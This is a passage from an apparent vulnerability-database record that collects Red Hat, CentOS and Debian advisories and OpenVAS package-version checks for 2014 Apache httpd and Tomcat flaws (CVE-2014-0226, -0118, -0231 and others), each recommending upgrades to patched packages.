module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. (CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. (CVE-2014-0119)\n\nAll users of Red Hat JBoss Web Server 2.0.1 on Red Hat Enterprise Linux 6\nare advised to upgrade to Red Hat JBoss Web Server 2.1.0. The JBoss server\nprocess must be restarted for this update to take effect.", "modified": "2018-06-07T02:42:48", "published": "2014-08-21T19:24:12", "id": "RHSA-2014:1087", "href": "https://access.redhat.com/errata/RHSA-2014:1087", "type": "redhat", "title": "(RHSA-2014:1087) Important: Red Hat JBoss Web Server 2.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-07-17T03:31:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0920\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032478.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032479.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0920.html", "edition": 5, "modified": "2014-07-23T15:13:08", "published": "2014-07-23T15:12:33", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/032478.html", "id": "CESA-2014:0920", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:25:43", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-4352", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0921\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032480.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\n", "edition": 3, "modified": "2014-07-23T15:36:55", "published": "2014-07-23T15:36:55", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/032480.html", "id": "CESA-2014:0921", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:51:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2989-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJuly 24, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2014-0118 CVE-2014-0226 CVE-2014-0231\n\nSeveral security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\n\n The DEFLATE input filter (inflates request bodies) in mod_deflate\n allows remote attackers to cause a denial of service (resource\n consumption) via crafted request data that decompresses to a much\n larger size.\n\nCVE-2014-0226\n\n A race condition was found in mod_status. An attacker able to\n access a public server status page on a server could send carefully\n crafted requests which could lead to a heap buffer overflow,\n causing denial of service, disclosure of sensitive information, or\n potentially the execution of arbitrary code.\n\nCVE-2014-0231\n\n A flaw was found in mod_cgid. If a server using mod_cgid hosted\n CGI scripts which did not consume standard input, a remote attacker\n could cause child processes to hang indefinitely, leading to denial\n of service.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2014-07-24T22:20:03", "published": "2014-07-24T22:20:03", "id": "DEBIAN:DSA-2989-1:7BF7C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00171.html", "title": "[SECURITY] [DSA 2989-1] apache2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:18:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-6438", "CVE-2014-0118", "CVE-2014-0226"], "description": "Package : apache2\nVersion : 2.2.16-6+squeeze13\nCVE ID : CVE-2013-6438 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231\n\nCVE-2014-0231: prevent denial of service in mod_cgid.\nCVE-2014-0226: prevent denial of service via race in mod_status.\nCVE-2014-0118: fix resource consumption via mod_deflate body decompression.\nCVE-2013-6438: prevent denial of service via mod_dav incorrect end of string\n", "edition": 11, "modified": "2014-09-29T13:41:46", "published": "2014-09-29T13:41:46", "id": "DEBIAN:DLA-66-1:F105A", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201409/msg00023.html", "title": "[SECURITY] [DLA 66-1] apache2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310881972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881972", "type": "openvas", "title": "CentOS Update for httpd CESA-2014:0920 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2014:0920 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881972\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:34:43 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for httpd CESA-2014:0920 centos5\");\n\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0920\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:00:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120103", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-388)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120103\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:29 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-388)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Apache HTTP server. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-388.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310881968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881968", "type": "openvas", "title": "CentOS Update for httpd CESA-2014:0920 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2014:0920 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881968\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:31:47 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for httpd CESA-2014:0920 centos6\");\n\n script_tag(name:\"affected\", value:\"httpd on CentOS 6\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0920\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310871203", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871203", "type": "openvas", "title": "RedHat Update for httpd RHSA-2014:0920-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2014:0920-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871203\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:42:09 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for httpd RHSA-2014:0920-01\");\n\n\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0920-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-July/msg00046.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted request data that decompresses to a much\nlarger size.\n\nCVE-2014-0226\nA race condition was found in mod_status. An attacker able to\naccess a public server status page on a server could send carefully\ncrafted requests which could lead to a heap buffer overflow,\ncausing denial of service, disclosure of sensitive information, or\npotentially the execution of arbitrary code.\n\nCVE-2014-0231\nA flaw was found in mod_cgid. If a server using mod_cgid hosted\nCGI scripts which did not consume standard input, a remote attacker\ncould cause child processes to hang 